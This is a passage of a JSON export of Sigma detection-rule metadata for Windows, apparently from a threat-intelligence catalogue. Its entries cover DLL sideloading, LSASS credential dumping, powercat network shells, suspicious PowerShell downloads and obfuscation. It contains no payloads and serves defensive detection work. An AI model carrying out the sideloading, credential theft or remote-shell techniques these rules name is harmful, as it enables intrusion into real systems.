This could be an indication of a \"PowerShell without PowerShell\" attack", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-01", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_amsi_suspicious_process.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_amsi_suspicious_process.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "6ec86d9e-912e-4726-91a2-209359b999b9", "value": "Amsi.DLL Loaded Via LOLBIN Process" }, { "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "creation_date": "2022-12-16", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_comctl32.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6360757a-d460-456c-8b13-74cf0e60cceb", "value": "Potential DLL Sideloading Via comctl32.dll" }, { 
"description": "Detects the image load of \"Python Core\" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe.", "meta": { "author": "Patrick St. John, OTR (Open Threat Research)", "creation_date": "2020-05-03", "falsepositive": [ "Legitimate Py2Exe Binaries", "Known false positive caused with Python Anaconda" ], "filename": "image_load_susp_python_image_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", "https://www.py2exe.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.002" ] }, "related": [ { "dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", "value": "Python Image Load By Non-Python Process" }, { "description": "Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process.\nThis library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). 
It has also recently been seen used by the BiBi wiper for Windows.\nIt could also be used for anti-analysis purposes by shutting down specific processes.\n", "meta": { "author": "Luc Génaux", "creation_date": "2023-11-28", "falsepositive": [ "Processes related to software installation" ], "filename": "image_load_dll_rstrtmgr_suspicious_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/windows-restart-manager-part-1/", "https://www.crowdstrike.com/blog/windows-restart-manager-part-2/", "https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/", "https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_suspicious_load.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1486", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b48492dc-c5ef-4572-8dff-32bc241c15c8", "value": "Load Of RstrtMgr.DLL By A Suspicious Process" }, { "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-03-13", "falsepositive": [ "Many legitimate applications leverage this DLL. 
(Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)" ], "filename": "image_load_side_load_wazuh.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wazuh.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "value": "Potential Wazuh Security Platform DLL Sideloading" }, { "description": "Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-28", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_vmmap_dbghelp_unsigned.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": 
[ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "273a8dd8-3742-4302-bcc7-7df5a80fe425", "value": "VMMap Unsigned Dbghelp.DLL Potential Sideloading" }, { "description": "Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-12", "falsepositive": [ "Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations" ], "filename": "image_load_office_excel_xll_susp_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/", "https://www.mandiant.com/resources/blog/lnk-between-browsers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_excel_xll_susp_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af4c4609-5755-42fe-8075-4effb49f5d44", "value": "Microsoft Excel Add-In Loaded From Uncommon Location" }, { "description": "Detects potential DLL sideloading of rcdll.dll", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-03-13", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_rcdll.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rcdll.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": 
"2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e78b74f-c762-4800-82ad-f66787f10c8a", "value": "Potential Rcdll.DLL Sideloading" }, { "description": "Detects DLL sideloading of \"dbgcore.dll\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-10-25", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "filename": "image_load_side_load_dbgcore.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", "value": "Potential DLL Sideloading Of DBGCORE.DLL" }, { "description": "Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-08-02", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_windows_defender.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ 
"https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_windows_defender.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "value": "Potential Mpclient.DLL Sideloading" }, { "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", "value": "Wmiprvse Wbemcomn DLL Hijack" }, { "description": "Detects potential DLL sideloading of \"libcurl.dll\" by the \"gup.exe\" process from an uncommon location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", 
"creation_date": "2023-05-05", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_gup_libcurl.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_gup_libcurl.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e49b5745-1064-4ac1-9a2e-f687bc2dd37e", "value": "Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE" }, { "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-07", "falsepositive": [ "Other DLLs with the same Imphash" ], "filename": "image_load_hktl_sharpevtmute.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/bats3c/EvtMute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_hktl_sharpevtmute.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49329257-089d-46e6-af37-4afce4290685", "value": "HackTool - SharpEvtMute DLL Load" }, { "description": "Detects potential DLL sideloading of \"CCleanerReactivator.dll\"", "meta": { "author": "X__Junior", "creation_date": 
"2023-07-13", "falsepositive": [ "False positives could occur from other custom installation paths. Apply additional filters accordingly." ], "filename": "image_load_side_load_ccleaner_reactivator.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lab52.io/blog/2344-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ccleaner_reactivator.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3735d5ac-d770-4da0-99ff-156b180bc600", "value": "Potential CCleanerReactivator.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"AVKkid.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_avkkid.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_avkkid.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "952ed57c-8f99-453d-aee0-53a49c22f95d", "value": "Potential AVKkid.DLL Sideloading" }, { "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", "meta": { "author": "frack113", "creation_date": "2022-12-13", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_classicexplorer32.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "caa02837-f659-466f-bca6-48bde2826ab4", "value": "Potential DLL Sideloading Via ClassicExplorer32.dll" }, { "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-30", "falsepositive": [ "Unlikely" ], "filename": "image_load_cmstp_load_dll_from_susp_location.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_cmstp_load_dll_from_susp_location.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.003" ] }, "related": [ { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", "value": "DLL Loaded From Suspicious Location Via Cmspt.EXE" }, { "description": "Loading unsigned image (DLL, EXE) into LSASS process", "meta": { "author": "Teymur Kheirkhabarov, oscd.community", "creation_date": "2019-10-22", "falsepositive": [ "Valid user connecting using RDP" ], "filename": "image_load_lsass_unsigned_image_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_lsass_unsigned_image_load.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", "value": "Unsigned Image Loaded Into LSASS Process" }, { "description": "Detects potential DLL sideloading of \"DbgModel.dll\"", "meta": { "author": "Gary Lobermier", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "filename": "image_load_side_load_dbgmodel.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/entries/microsoft/built-in/dbgmodel.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgmodel.yml" ], "tags": [ "attack.defense-evasion", 
"attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fef394cd-f44d-4040-9b18-95d92fe278c0", "value": "Potential DLL Sideloading Of DbgModel.DLL" }, { "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Legitimate macro usage. Add the appropriate filter according to your environment" ], "filename": "image_load_office_outlook_outlvba_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_outlook_outlvba_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "value": "Microsoft VBA For Outlook Addin Loaded Via Outlook" }, { "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "image_load_iexplore_dcom_iertutil_dll_hijack.yml", "level": "critical", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml" ], 
"tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f354eba5-623b-450f-b073-0b5b2773b6aa", "value": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load" }, { "description": "Detects a remote DLL load event via \"rundll32.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "image_load_rundll32_remote_share_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/gabe-k/themebleed", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_remote_share_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f40017b3-cb2e-4335-ab5d-3babf679c1de", "value": "Remote DLL Load Via Rundll32.EXE" }, { "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-08-17", "falsepositive": [ "Applications that load the same DLLs mentioned in the detection section. 
Investigate them and filter them out if a lot FPs are caused.", "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "filename": "image_load_side_load_antivirus.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "value": "Potential Antivirus Software DLL Sideloading" }, { "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", "meta": { "author": "frack113", "creation_date": "2021-07-21", "falsepositive": [ "Unknown" ], "filename": "posh_pc_powercat.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://github.com/besimorhino/powercat", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://nmap.org/ncat/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], "tags": [ "attack.command-and-control", "attack.t1095" ] }, "related": [ { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", "value": "Netcat The Powershell Version" }, { "description": "Detects suspicious PowerShell download command", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "PowerShell scripts that download content from the Internet" ], "filename": "posh_pc_susp_download.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", "value": "Suspicious PowerShell Download" }, { "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", "meta": { "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "creation_date": "2020-06-29", "falsepositive": [ "Unknown" ], "filename": "posh_pc_xor_commandline.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "value": 
"Suspicious XOR Encoded PowerShell Command Line - PowerShell" }, { "description": "Detects PowerShell called from an executable by the version mismatch method", "meta": { "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "creation_date": "2017-03-05", "falsepositive": [ "Unknown" ], "filename": "posh_pc_exe_calling_ps.yml", "level": "high", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "value": "PowerShell Called from an Executable Version Mismatch" }, { "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "posh_pc_wsman_com_provider_no_powershell.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" 
}, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", "value": "Suspicious Non PowerShell WSMAN COM Provider" }, { "description": "Detects a PowerShell downgrade attack by comparing the host version with the actually used engine version (2.0)", "meta": { "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "creation_date": "2017-03-22", "falsepositive": [ "Unknown" ], "filename": "posh_pc_downgrade_attack.yml", "level": "medium", "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 